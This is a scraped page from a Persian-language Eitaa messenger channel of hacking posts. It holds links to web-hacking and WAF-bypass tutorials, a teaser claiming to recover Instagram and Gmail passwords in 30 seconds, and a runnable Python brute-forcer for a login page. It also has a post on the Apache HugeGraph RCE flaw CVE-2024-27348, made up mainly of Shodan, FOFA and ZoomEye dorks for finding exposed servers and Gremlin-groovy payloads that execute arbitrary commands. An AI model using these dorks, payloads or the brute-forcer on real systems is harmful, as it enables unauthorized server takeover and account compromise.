eitaa logo
Code Block
537 دنبال‌کننده
254 عکس
30 ویدیو
2 فایل
Code Block 📱کشف _ تحلیل _ توسعه 💻 کدنویسی _ امنیت _ فناوری
مشاهده در ایتا
دانلود
Code Block
این یکی گزارشمو توی هکروان شیر میکنم باهاتون اما چرا فقط این و گذاشتم ؟ چون یک تارگتی بود که خفن ت
خوب شانستون زد داپلیکیت هم نخورد پس یه آموزش کشف آسیب پذیری از پلتفرم خارجی توی هکروان حتی اگه بهترینا روش کار کرده باشن طلبتون !
آشنایی با تست و بررسی امنیت API در وب هKینگ ⬅️لینک آموزش➡️ Code Block
آموزش بایپس وف cloudFlare ⬅️مشاهده ویدیو در یوتیوب➡️ Code Block
🖱 🎩آموزش پروتکل HTTP برای تست نفوذ وب 🔤 ❕چکیده مطلب: در این مقاله کامل با پروتکل HTTP برای تست نفوذ آشنا شوید. این آموزش مفاهیم مهمی مانند ارسال درخواست، کدهای وضعیت، کوکی‌ها و هدرها را برای هکرهای مبتدی توضیح می‌دهد.💻 ⌛ زمان مطالعه : 11 دقیقه ⬅️لینک آموزش➡️ Code Block
بهترین محیط های ازمایشگاهی ای که میتونید ازشون برای تمرین در زمان افلاین بودن استفاده کنید و مهارت هاتون رو رشد بدید ⭕️⭕️ :‌اگر رشد نکنید حالت ثابتی وجود نداره یا مهارتت رو رشد و تمرین میدی یا مهارتت رو به سمت مرگ میبری !‌حالت وسطی وجود نداره
اگر به گیت هاب دستترسی ندارید به یک BruteForcer صفحه لاگین نیاز دارید میتونید از این قطعه کد کمک بگیرید:‌ ‍‍‍ import requests url = "http://zerodey.ir/labs/lab1/index.php" username = "admin" # Generating 4-digit numeric passwords (0000-9999) password_list = [str(i).zfill(4) for i in range(10000)] def brute_force(): for password in password_list: data = {"username": username, "password": password} response = requests.post(url, data=data) if "Invalid" not in response.text: print(f"[+] Found valid credentials: {username}:{password}") break else: print(f"[-] Attempted: {password}") brute_force()
00:00:00
2.4M حجم رسانه بالاست
مشاهده در ایتا
🔻🎥بازیابی رمز اینستاگرام و جیمیل در ۳۰ ثانیه!
🔓 CVE-2024-27348 — آسیب‌پذیری بحرانی RCE در Apache HugeGraph-Server 🔓
🔓 CVE-2024-27348 — آسیب‌پذیری بحرانی RCE در Apache HugeGraph-Server 🔓 🟢 CVE-2024-27348 یک آسیب‌پذیری بسیار مهم و بحرانی (Critical) با امتیاز CVSS 9.8 در Apache HugeGraph-Server است که در نسخه‌های 1.0.0 تا قبل از 1.3.0 وجود دارد. این آسیب‌پذیری از نوع Remote Code Execution (اجرای کد از راه دور) بوده و به مهاجم اجازه می‌دهد بدون احراز هویت، دستورات دلخواه را روی سرور اجرایی کند. https://nvd.nist.gov/vuln/detail/cve-2024-27348 📌 چه اتفاقی می‌افتد؟ آسیب‌پذیری در تعامل با Gremlin (زبان پرس‌وجوی گراف) یا بخش‌های مدیریتی HugeGraph قرار دارد. مهاجم با ارسال ورودی‌های خاص می‌تواند از ضعف کنترل دسترسی سوءاستفاده کند و کد دلخواهش را روی سرور اجرا نماید. 📍 پیامدها: دسترسی کامل به سیستم افشای داده‌های حساس نصب بدافزار یا ایجاد بکدور مختل کردن سرویس‌ها و حذف/تغییر داده‌ها 👾 shodan dork 1 http.title:"HugeGraph" 2 http.html:"HugeGraph Server" 3 product:"Apache HugeGraph" 4 port:8080 "HugeGraph" 👾 fofa dork 1 app="Apache-HugeGraph" 2 title="HugeGraph" 3 body="HugeGraph Server" 4 server="HugeGraph" 5 body="gremlin" && body="HugeGraph" 6 app="Apache-HugeGraph" && port="8080" 👾ZoomEye Dorks 1 app:"Apache HugeGraph" 2 service:"HugeGraph" 3 title:"HugeGraph" exploit http://target.com/gremlin 🧪 روش تست دستی با Burp Suite ( PoC) 1 رهگیری درخواست Burp → Proxy → Intercept ON وارد مسیر /gremlin درخاست رو از گت به پست تغیر میدیم POST /gremlin HTTP/1.1 Host: target:8080 Content-Type: application/json Content-Length: ... {         "gremlin": f"def result = \"{ls}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",     } ..................... payload 1 {         "gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList({formatted_words});Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",         "bindings": {},         "language": "gremlin-groovy",         "aliases": {}     } payload 2         "gremlin": f"def result = \"{command}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",     } 2 https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE 3 https://github.com/kljunowsky/CVE-2024-27348/blob/main/CVE-2024-27348.py